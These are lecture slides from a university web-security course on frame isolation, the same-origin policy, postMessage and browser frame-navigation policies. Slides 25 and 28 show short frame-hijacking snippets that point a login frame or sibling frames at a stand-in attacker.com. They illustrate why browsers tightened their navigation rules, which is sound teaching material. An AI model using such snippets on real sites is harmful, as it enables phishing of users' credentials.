Frame isolation and the same origin policy Collin Jackson CS 142 Winter 2009.


1 Frame isolation and the same origin policy Collin Jackson CS 142 Winter 2009

2 Outline. Security User Interface: goals of a browser; when is it safe to type my password? Same-Origin Policy: how sites are isolated; opting out of isolation. Navigation: frame hijacking; navigation policy.

3 Running Remote Code is Risky. Integrity: compromise your machine, install malware or a rootkit, transact on your accounts. Confidentiality: read your information, steal passwords, read your email.

4 Browser Sandbox. Goal: run remote web applications safely, with limited access to the OS, the network, and browser data. Approach: isolate sites in different security contexts; the browser manages resources, like an OS.

5 Security User Interface: when is it safe to type my password?

6 Safe to type your password?

7

8

9 ???

10 Safe to type your password?

11 Frames. Modularity: brings together content from multiple sources (client-side aggregation). Delegation: a frame can draw only on its own rectangle. Example frames shown: src = 7.gmodules.com/..., name = remote_iframe_7; src = google.com/…, name = awglogin.

12 Popup windows. With hyperlinks: click here. With JavaScript: mywin = window.open("http://www.b.com", "foo", "width=10,height=10"). Navigating a named window re-uses the existing one. Can access properties of the remote window: mywin.document.body; mywin.location = "http://www.c.com";

13 Windows Interact

14 Are all interactions good?

15 Same-Origin Policy: how does the browser isolate different sites?

16 Policy Goals. Safe to visit an evil web site. Safe to visit two pages at the same time (the address bar distinguishes them). Allow safe delegation.

17 Same Origin Policy. Origin = protocol://host:port. Full access within the same origin: full network access, read/write DOM, storage (more on Weds.). Assumptions? (Diagram: Site A, Site A context.)

18 Library import. A script has the privileges of the importing page, NOT of the source server. It can script other pages in this origin and load more scripts. Other forms of importing.

19 Data export. Many ways to send information to other origins; no user involvement required; cannot read back the response.

20 Domain Relaxation. Origin: scheme, host, (port), hasSetDomain. Try document.domain = document.domain. (Diagram: www.facebook.com, chat.facebook.com, facebook.com.)

21 Recent Developments. Cross-origin network requests: Access-Control-Allow-Origin: ; Access-Control-Allow-Origin: *. Cross-origin client-side communication: client-side messaging via navigation (older browsers); postMessage (newer browsers). (Diagram: Site A context, Site B context.)

22 window.postMessage. New API for inter-frame communication; supported in latest betas of many browsers; a network-like channel between frames. (Demo: Add a contact, Share contacts.)

23 postMessage syntax. Sender: frames[0].postMessage("Attack at dawn!", "http://b.com/"); Receiver: window.addEventListener("message", function (e) { if (e.origin == "http://a.com") { ... e.data ... } }, false); (Demo: Facebook Anecdote; message "Attack at dawn!")

24 Navigation: who decides what content goes in a frame?

25 A Guninski Attack. Target frame name: awglogin. window.open("https://attacker.com/", "awglogin");

26 What should the policy be? Child; Sibling; Descendant; Frame Bust.

27 Legacy Browser Behavior

Browser            Policy
IE 6 (default)     Permissive
IE 6 (option)      Child
IE7 (no Flash)     Descendant
IE7 (with Flash)   Permissive
Firefox 2          Window
Safari 3           Permissive
Opera 9            Window
HTML 5             Child

28 Window Policy Anomaly. top.frames[1].location = "http://www.attacker.com/..."; top.frames[2].location = "http://www.attacker.com/..."; ...

29 Adoption of Descendant Policy

Browser            Policy
IE7 (no Flash)     Descendant
IE7 (with Flash)   Descendant
Firefox 3          Descendant
Safari 3           Descendant
Opera 9            (many policies)
HTML 5             Descendant

30 Why include "targetOrigin"? What goes wrong with frames[0].postMessage("Attack at dawn!"); ? Messages are sent to frames, not principals. When would this happen?

31 Conclusion. The same origin policy is flexible: the address bar reflects the principal that's in control, but content may be affected by other principals. Delegation: library import, domain relaxation, pixel delegation via frames. Communication: data export, opt-in messaging.

32 Reading. Securing Browser Frame Communication. Adam Barth, Collin Jackson, and John C. Mitchell. http://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy

